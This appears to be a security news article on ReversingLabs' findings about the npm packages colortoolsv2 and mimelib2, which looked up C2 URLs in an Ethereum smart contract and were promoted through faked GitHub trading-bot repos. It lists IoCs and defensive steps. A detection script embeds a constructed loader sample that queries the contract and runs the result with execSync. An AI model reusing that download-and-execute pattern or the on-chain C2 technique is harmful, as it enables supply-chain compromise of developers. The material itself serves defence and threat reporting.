Attackers abuse Ethereum smart contracts to hide npm malware, ReversingLabs finds

Last updated: 09/05/2025
  • The malicious npm packages colortoolsv2 and mimelib2 fetched their C2 URLs from an Ethereum smart contract to evade detection.
  • On-chain indirection let the operators rotate hosting locations without republishing the packages; colortoolsv2 was removed on July 7, before the pivot to mimelib2.
  • A coordinated GitHub push used faux trading-bot repos, inflated stars, and scripted commits to disguise the malicious dependency.
  • IoCs include package versions, SHA1 hashes, and the contract 0x1f171a1b07c108eae05a5bccbe86922d66227e2b, together with guidance for defenders.

Ethereum smart contracts used to hide npm malware

Threat actors have turned to a new trick: moving malicious infrastructure onto an Ethereum smart contract in order to hide the command-and-control (C2) pointers used by npm packages. According to ReversingLabs, two packages, colortoolsv2 and mimelib2, quietly reached into the blockchain to retrieve the URL of a second-stage payload, sidestepping the conventional checks that look for hard-coded domains.

Rather than exploiting a flaw in Ethereum itself, the scheme uses the network as a public, tamper-resistant storage layer. After colortoolsv2 was blocked on npm on July 7, the operators quickly switched to mimelib2 with a near-identical design, continuing to reference the same on-chain contract for the next step.

From npm install to on-chain lookup: how the detour works

How the npm packages call the Ethereum contract

Inside colortoolsv2, a small loader (index.js) acted as a conduit: it invoked an external command and fetched its target from the smart contract rather than from a local script or a static configuration. Etherscan shows the contract at 0x1f171a1b07c108eae05a5bccbe86922d66227e2b; its read functions returned the URL used to reach the C2 service.

This on-chain pointer indirection is the crux of the technique: defenders could not rely on detecting or blocklisting a hard-coded domain in the package, because the live hosting location sat behind a contract the operators controlled. Rotating locations required only an update to the contract's storage, not a republished npm artifact, and the resulting blockchain traffic blends in with legitimate activity.

Once triggered at install or run time, the loader retrieved a second-stage component (SHA1 021d0eef8f457eb2a9f9fb2260dd2e39ff009a21), which handled the follow-on work. Mirroring the behavior of colortoolsv2, mimelib2 reused the same contract for the same purpose, with nearly identical code paths.

ReversingLabs characterized the technique as unusual in the npm ecosystem: the malicious URLs were hosted in smart-contract state rather than in the conventional web resources commonly seen in supply-chain campaigns (e.g., cloud storage or paste sites).
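The loader pattern described above, reduced to a static triage check, as an added example that is neither ReversingLabs' analysis code nor the packages' own source (which the article does not reproduce): it scores a package manifest and loader source for the three-part combination the article describes, a lifecycle hook that runs code at install, a child_process execution primitive, and a read of Ethereum contract state. The regular expressions for contract reads are assumptions about how a loader would typically query a contract (the web3 or ethers libraries, or a raw JSON-RPC eth_call); the sample inputs, including the 4-byte function selector, are constructed and illustrative, not the real package contents.

```javascript
// Added example: static triage of an npm package for the install-time
// "read C2 pointer from an Ethereum contract, then execute" detour.
// The indicator regexes are assumptions about typical loader code, not a
// reproduction of colortoolsv2 or mimelib2.

const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Individual indicators; the verdict is based on their combination.
const INDICATORS = [
  { id: "child_process",   re: /\brequire\(\s*['"](?:node:)?child_process['"]\s*\)|\bfrom\s+['"](?:node:)?child_process['"]/ },
  { id: "exec_primitive",  re: /\b(?:exec|execSync|spawn|spawnSync|execFile)\s*\(/ },
  { id: "eth_rpc",         re: /eth_call|["']eth_getStorageAt["']/ },          // raw JSON-RPC contract read (assumed)
  { id: "eth_library",     re: /\brequire\(\s*['"](?:ethers|web3)['"]\s*\)|\bfrom\s+['"](?:ethers|web3)['"]/ },
  { id: "contract_address", re: /0x[0-9a-fA-F]{40}\b/ },                       // 20-byte address literal
  { id: "dynamic_fetch",   re: /\b(?:fetch|https?\.get|axios(?:\.get)?)\s*\(/ },
];

// Lifecycle hooks whose command runs JavaScript at install time.
function hooksRunningCode(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  return LIFECYCLE_HOOKS.filter(
    (h) => typeof scripts[h] === "string" && /\bnode\b|\.js\b/.test(scripts[h])
  );
}

function scanSource(src) {
  return INDICATORS.filter((i) => i.re.test(src)).map((i) => i.id);
}

// Distinct address literals, lower-cased so they can be compared with IoC lists.
function extractAddresses(src) {
  const found = src.match(/0x[0-9a-fA-F]{40}\b/g) || [];
  return [...new Set(found.map((a) => a.toLowerCase()))];
}

function triagePackage(pkg, loaderSource) {
  const hooks = hooksRunningCode(pkg);
  const indicators = scanSource(loaderSource);
  const readsChain = indicators.includes("eth_rpc") || indicators.includes("eth_library");
  const runsCommands = indicators.includes("child_process") || indicators.includes("exec_primitive");
  let verdict = "clean";
  if (hooks.length && readsChain && runsCommands) verdict = "block";   // the full detour
  else if (hooks.length && (readsChain || runsCommands || indicators.includes("dynamic_fetch"))) verdict = "review";
  return { name: pkg.name, version: pkg.version, hooks, indicators, addresses: extractAddresses(loaderSource), verdict };
}

// Constructed samples (not the real package contents). The loader text is only
// scanned, never executed; RPC and decode are deliberately undefined.
const SUSPICIOUS_PKG = { name: "example-colors", version: "1.0.0", scripts: { postinstall: "node index.js" } };
const SUSPICIOUS_LOADER = `
const { execSync } = require("child_process");
const body = JSON.stringify({ jsonrpc: "2.0", id: 1, method: "eth_call",
  params: [{ to: "0x1f171a1b07c108eae05a5bccbe86922d66227e2b", data: "0x20965255" /* selector of an assumed read function */ }, "latest"] });
fetch(RPC, { method: "POST", body }).then(r => r.json()).then(j => execSync(decode(j.result)));
`;
const BENIGN_PKG = { name: "example-util", version: "2.1.0", scripts: { test: "node test.js" } };
const BENIGN_LOADER = `module.exports = (s) => s.toUpperCase();`;

console.log(triagePackage(SUSPICIOUS_PKG, SUSPICIOUS_LOADER)); // verdict "block"
console.log(triagePackage(BENIGN_PKG, BENIGN_LOADER));         // verdict "clean"
```

The check deliberately keys on the combination rather than on any single indicator: a hard-coded address alone is normal in a wallet library, and child_process alone is normal in build tooling, but a lifecycle hook that both reads chain state and executes a command is the shape this campaign took.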

GitHub smoke and mirrors: fake trading-bot repos as cover

GitHub repos used to hide the malicious npm dependency

The npm packages did not appear in isolation. The operators stood up a network of GitHub projects presented as crypto trading tools, repositories such as solana-trading-bot-v2, and wired them to the malicious artifacts. To a casual observer these repos looked "alive," boasting thousands of commits, multiple maintainers, stars, and watchers.

A closer look revealed that much of the activity was scripted and superficial, including repeated license-file commits from freshly created accounts with minimal content (some created around July 10, with README files as short as "Hello"). Usernames in the commit history, among them slunfuedrac, cnaovalles, and pasttimerles, recurred across the staged projects.

The commits point directly to where the packages were wired into the codebase: colortoolsv2, and later mimelib2, were added as dependencies in bot.ts, with matching imports from src/index.ts. The manufactured social proof made the dependency insertion far less conspicuous during a superficial review.

In effect, the GitHub façade inflated trust signals while the real decision point for the malware's next move lived on Ethereum. By separating the social engineering (GitHub) from the control plane (the smart contract), the operators made the campaign harder to spot and to disrupt.

IoCs and concrete steps for defenders

IoCs for npm malware using Ethereum contracts

ReversingLabs published a detailed list of artifacts tied to this activity, along with the primary on-chain reference that drove the second stage. The following items can be used to hunt, block, and verify exposure in build pipelines and on developer workstations:

  • npm packages: colortoolsv2 1.0.0 (SHA1 678c20775ff86b014ae8d9869ce5c41ee06b6215), 1.0.1 (1bb7b23f45ed80bce33a6b6e6bc4f99750d5a34b), 1.0.2 (db86351f938a55756061e9b1f4469ff2699e9e27)
  • npm packages: mimelib2 1.0.0 (bda31e9022f5994385c26bd8a451acf0cd0b36da), 1.0.1 (c5488b605cf3e9e9ef35da407ea848cf0326fdea)
  • Second stage: SHA1 021d0eef8f457eb2a9f9fb2260dd2e39ff009a21
  • Smart contract used for the C2 detour: 0x1f171a1b07c108eae05a5bccbe86922d66227e2b

Additional context from the takedown phase: colortoolsv2 was removed from npm on July 7, after which the operators pivoted to mimelib2 with the same on-chain reference and near-identical loader behavior.

Recommended actions for engineering and defense teams include:
  • alert on on-chain lookups performed by install scripts;
  • block or alert on child_process execution in package lifecycle hooks;
  • deny network egress during npm install in CI;
  • enforce registry and maintainer allowlists;
  • pin mutable versions;
  • monitor requests tied to the contract address listed above.

More broadly, treat repository popularity metrics as non-security signals. Trust should derive from code, artifacts, and network indicators, not from star counts, commit volume, or the appearance of many "maintainers." Independent verification (static analysis, sandboxed execution, and SBOM-driven dependency review) remains essential.

What stands out in this campaign is not a flaw in Ethereum, npm, or GitHub individually, but how public infrastructure can be woven into a covert delivery chain. By moving C2 discovery into a smart contract and borrowing credibility from GitHub, the actors pushed the attack out of the field of view of traditional detection. Attention to dependency hygiene and layered controls are the counterweight.
